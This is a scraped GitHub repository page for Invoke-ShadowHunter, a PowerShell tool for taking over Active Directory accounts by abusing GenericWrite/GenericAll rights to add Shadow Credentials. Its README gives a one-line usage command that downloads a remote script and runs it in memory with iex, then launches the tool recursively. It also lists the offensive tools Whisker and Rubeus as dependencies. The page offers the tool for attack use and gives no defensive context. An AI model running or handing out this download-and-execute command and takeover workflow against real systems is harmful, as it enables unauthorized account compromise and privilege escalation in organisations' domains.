Skip to content

Automate accounts takeover by abusing GenericWrite/GenericAll rights to add Shadow Credentials

Notifications You must be signed in to change notification settings

serheoS/Invoke-ShadowHunter

This branch is up to date with Leo4j/Invoke-ShadowHunter:main.

Folders and files

NameName
Last commit message
Last commit date

Latest commit

d654bd1 · Sep 20, 2023

History

11 Commits
Sep 20, 2023
Sep 11, 2023

Repository files navigation

Invoke-ShadowHunter

Automate accounts takeover by abusing GenericWrite/GenericAll rights to add Shadow Credentials

I'll add usage details soon, in the meantime, please watch the videos below

Main Usage:

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-ShadowHunter/main/Invoke-ShadowHunter.ps1')
Invoke-ShadowHunter -Recursive
Video.08-09-2023.15-19-06.mp4

Add entries to the table and run:

Video.08-09-2023.15-42-44.mp4

Dependencies

https://github.com/eladshamir/Whisker

https://github.com/GhostPack/Rubeus

About

Automate accounts takeover by abusing GenericWrite/GenericAll rights to add Shadow Credentials

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • PowerShell 100.0%